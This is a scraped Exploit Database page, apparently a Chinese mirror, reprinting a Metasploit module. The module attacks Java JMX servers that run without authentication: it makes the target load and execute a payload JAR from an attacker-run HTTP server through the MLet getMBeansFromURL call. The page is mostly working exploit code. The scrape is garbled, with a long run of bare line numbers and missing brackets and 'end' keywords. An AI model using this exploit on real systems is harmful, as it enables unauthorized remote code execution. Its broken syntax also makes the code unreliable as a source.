Java JMX – Server Insecure Configuration Java Code Execution (Metasploit)

Exploit Database
124 阅读

作者： Metasploit

日期： 2015-02-17
类别：
- remote
平台：
- java
来源：https://www.exploit-db.com/exploits/36101/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

210

211

212

213

214

215

216

217

218

219

220

221

222

223

224

225

226

227

228

229

230

231

232

233

234

235

236

237

238

239

240

241

242

243

244

245

246

247

248

249

250

251

252

253

254

255

256

257

258

259

260

261

262

263

264

265

266

267

268

269

270

271

272

273

274

275

276

277

278

279

280

281

282

283

284

285

286

287

288

289

290

291

292

293

294

295

296

297

298

299

300

301

302

303

304

305

306

307

308

309

310

311

312

313

314

315

316

317

318

319

320

321

322

323

324

325

326

327

328

329

330

331

332

333

334

335

336

337

338

339

340

341

342

343

344

345

346

347

348

349

350

351

352

353

354

355

356

357

358

359

360

361

362

363

364

365

366

367

368

369

370

# This module requires Metasploit: http://metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Java::Jmx

include Msf::Exploit::Remote::HttpServer

include Msf::Java::Rmi::Client

def initialize(info = {})

super(update_info(info,

'Name' => 'Java JMX Server Insecure Configuration Java Code Execution',

'Description'=> %q{

This module takes advantage a Java JMX interface insecure configuration, which would

allow loading classes from any remote (HTTP) URL. JMX interfaces with authentication

disabled (com.sun.management.jmxremote.authenticate=false) should be vulnerable, while

interfaces with authentication enabled will be vulnerable only if a weak configuration

is deployed (allowing to use javax.management.loading.MLet, having a security manager

allowing to load a ClassLoader MBean, etc.).

'Author' =>

[

'Braden Thomas', # Attack vector discovery

'juan vazquez' # Metasploit module

'License'=> MSF_LICENSE,

'References' =>

[

['URL', 'https://docs.oracle.com/javase/8/docs/technotes/guides/jmx/JMX_1_4_specification.pdf'],

['URL', 'http://www.accuvant.com/blog/exploiting-jmx-rmi']

'Platform' => 'java',

'Arch' => ARCH_JAVA,

'Privileged' => false,

'Payload'=> { 'BadChars' => '', 'DisableNops' => true },

'Stance' => Msf::Exploit::Stance::Aggressive,

'DefaultOptions' =>

{

'WfsDelay' => 10

'Targets'=>

[

[ 'Generic (Java Payload)', {} ]

'DefaultTarget'=> 0,

'DisclosureDate' => 'May 22 2013'

))

register_options([

Opt::RPORT(1617)

], self.class)

end

def on_request_uri(cli, request)

if request.uri =~ /mlet$/

jar = "#{rand_text_alpha(8 + rand(8))}.jar"

mlet = "<HTML><mlet code=\"metasploit.JMXPayload\" "

mlet << "archive=\"#{jar}\" "

mlet << "name=\"#{@mlet}:name=jmxpayload,id=1\" "

mlet << "codebase=\"#{get_uri}\"></mlet></HTML>"

send_response(cli, mlet,

{

'Content-Type' => 'application/octet-stream',

'Pragma' => 'no-cache'

})

print_status("Replied to request for mlet")

elsif request.uri =~ /\.jar$/i

p = regenerate_payload(cli)

jar = p.encoded_jar

paths = [

["metasploit", "JMXPayloadMBean.class"],

["metasploit", "JMXPayload.class"],

]

jar.add_files(paths, [ Msf::Config.data_directory, "java" ])

send_response(cli, jar.pack,

{

'Content-Type' => 'application/java-archive',

'Pragma' => 'no-cache'

})

print_status("Replied to request for payload JAR")

end

def check

connect

unless is_rmi?

return Exploit::CheckCode::Safe

end

mbean_server = discover_endpoint

disconnect

if mbean_server.nil?

return Exploit::CheckCode::Safe

end

connect(true, { 'RPORT' => mbean_server[:address], 'RPORT' => mbean_server[:port] })

unless is_rmi?

return Exploit::CheckCode::Unknown

end

jmx_endpoint = handshake(mbean_server)

disconnect

if jmx_endpoint.nil?

return Exploit::CheckCode::Detected

end

Exploit::CheckCode::Appears

end

def exploit

@mlet = "MLet#{rand_text_alpha(8 + rand(4)).capitalize}"

connect

print_status("#{peer} - Sending RMI Header...")

unless is_rmi?

fail_with(Failure::NoTarget, "#{peer} - Failed to negotiate RMI protocol")

end

print_status("#{peer} - Discoverig the JMXRMI endpoint...")

mbean_server = discover_endpoint

disconnect

if mbean_server.nil?

fail_with(Failure::NoTarget, "#{peer} - Failed to discover the JMXRMI endpoint")

else

print_good("#{peer} - JMXRMI endpoint on #{mbean_server[:address]}:#{mbean_server[:port]}")

end

connect(true, { 'RPORT' => mbean_server[:address], 'RPORT' => mbean_server[:port] })

unless is_rmi?

fail_with(Failure::NoTarget, "#{peer} - Failed to negotiate RMI protocol with the MBean server")

end

print_status("#{peer} - Proceeding with handshake...")

jmx_endpoint = handshake(mbean_server)

if jmx_endpoint.nil?

fail_with(Failure::NoTarget, "#{peer} - Failed to handshake with the MBean server")

else

print_good("#{peer} - Handshake with JMX MBean server on #{jmx_endpoint[:address]}:#{jmx_endpoint[:port]}")

end

print_status("#{peer} - Loading payload...")

unless load_payload(jmx_endpoint)

fail_with(Failure::Unknown, "#{peer} - Failed to load the payload")

end

print_status("#{peer} - Executing payload...")

invoke_run_stream = invoke_stream(

obj_id: jmx_endpoint[:id].chop,

object: "#{@mlet}:name=jmxpayload,id=1",

method: 'run'

)

send_call(call_data: invoke_run_stream)

disconnect

end

def is_rmi?

send_header

ack = recv_protocol_ack

if ack.nil?

return false

end

true

end

def discover_endpoint

send_call(call_data: discovery_stream)

return_data = recv_return

if return_data.nil?

vprint_error("#{peer} - Discovery request didn't answer")

return nil

end

answer = extract_object(return_data, 1)

if answer.nil?

vprint_error("#{peer} - Unexpected JMXRMI discovery answer")

return nil

end

case answer

when 'javax.management.remote.rmi.RMIServerImpl_Stub'

mbean_server = extract_unicast_ref(StringIO.new(return_data.contents[2].contents))

else

vprint_error("#{peer} - JMXRMI discovery returned unexpected object #{answer}")

return nil

end

mbean_server

end

def handshake(mbean)

vprint_status("#{peer} - Sending handshake / authentication...")

send_call(call_data: handshake_stream(mbean[:id].chop))

return_data = recv_return

if return_data.nil?

vprint_error("#{peer} - Failed to send handshake")

return nil

end

answer = extract_object(return_data, 1)

if answer.nil?

vprint_error("#{peer} - Unexpected handshake answer")

return nil

end

case answer

when 'java.lang.SecurityException'

vprint_error("#{peer} - JMX end point requires authentication, but it failed")

return nil

when 'javax.management.remote.rmi.RMIConnectionImpl_Stub'

vprint_good("#{peer} - Handshake completed, proceeding...")

conn_stub = extract_unicast_ref(StringIO.new(return_data.contents[2].contents))

else

vprint_error("#{peer} - Handshake returned unexpected object #{answer}")

return nil

end

conn_stub

end

def load_payload(conn_stub)

vprint_status("#{peer} - Getting JMXPayload instance...")

get_payload_instance = get_object_instance_stream(obj_id: conn_stub[:id].chop , name: "#{@mlet}:name=jmxpayload,id=1")

send_call(call_data: get_payload_instance)

return_data = recv_return

if return_data.nil?

vprint_error("#{peer} - The request to getObjectInstance failed")

return false

end

answer = extract_object(return_data, 1)

if answer.nil?

vprint_error("#{peer} - Unexpected getObjectInstance answer")

return false

end

case answer

when 'javax.management.InstanceNotFoundException'

vprint_warning("#{peer} - JMXPayload instance not found, trying to load")

return load_payload_from_url(conn_stub)

when 'javax.management.ObjectInstance'

vprint_good("#{peer} - JMXPayload instance found, using it")

return true

else

vprint_error("#{peer} - getObjectInstance returned unexpected object #{answer}")

return false

end

def load_payload_from_url(conn_stub)

vprint_status("Starting service...")

start_service

vprint_status("#{peer} - Creating javax.management.loading.MLet MBean...")

create_mbean = create_mbean_stream(obj_id: conn_stub[:id].chop, name: 'javax.management.loading.MLet')

send_call(call_data: create_mbean)

return_data = recv_return

if return_data.nil?

vprint_error("#{peer} - The request to createMBean failed")

return false

end

answer = extract_object(return_data, 1)

if answer.nil?

vprint_error("#{peer} - Unexpected createMBean answer")

return false

end

case answer

when 'javax.management.InstanceAlreadyExistsException'

vprint_good("#{peer} - javax.management.loading.MLet already exists")

when 'javax.management.ObjectInstance'

vprint_good("#{peer} - javax.management.loading.MLet created")

when 'java.lang.SecurityException'

vprint_error("#{peer} -The provided user hasn't enough privileges")

return false

else

vprint_error("#{peer} - createMBean returned unexpected object #{answer}")

return false

end

vprint_status("#{peer} - Getting javax.management.loading.MLet instance...")

get_mlet_instance = get_object_instance_stream(obj_id: conn_stub[:id].chop , name: 'DefaultDomain:type=MLet')

send_call(call_data: get_mlet_instance)

return_data = recv_return

if return_data.nil?

vprint_error("#{peer} - The request to getObjectInstance failed")

return false

end

answer = extract_object(return_data, 1)

if answer.nil?

vprint_error("#{peer} - Unexpected getObjectInstance answer")

return false

end

case answer

when 'javax.management.InstanceAlreadyExistsException'

vprint_good("#{peer} - javax.management.loading.MLet already found")

when 'javax.management.ObjectInstance'

vprint_good("#{peer} - javax.management.loading.MLet instance created")

else

vprint_error("#{peer} - getObjectInstance returned unexpected object #{answer}")

return false

end

vprint_status("#{peer} - Loading MBean Payload with javax.management.loading.MLet#getMBeansFromURL...")

invoke_mlet_get_mbean_from_url = invoke_stream(

obj_id: conn_stub[:id].chop,

object: 'DefaultDomain:type=MLet',

method: 'getMBeansFromURL',

args: { 'java.lang.String' => "#{get_uri}/mlet" }

)

send_call(call_data: invoke_mlet_get_mbean_from_url)

return_data = recv_return

vprint_status("Stopping service...")

stop_service

if return_data.nil?

vprint_error("#{peer} - The call to getMBeansFromURL failed")

return false

end

answer = extract_object(return_data, 3)

if answer.nil?

vprint_error("#{peer} - Unexpected getMBeansFromURL answer")

return false

end

case answer

when 'javax.management.InstanceAlreadyExistsException'

vprint_good("#{peer} - The remote payload was already loaded... okey, using it!")

return true

when 'javax.management.ObjectInstance'

vprint_good("#{peer} - The remote payload has been loaded!")

return true

else

vprint_error("#{peer} - getMBeansFromURL returned unexpected object #{answer}")

return false

end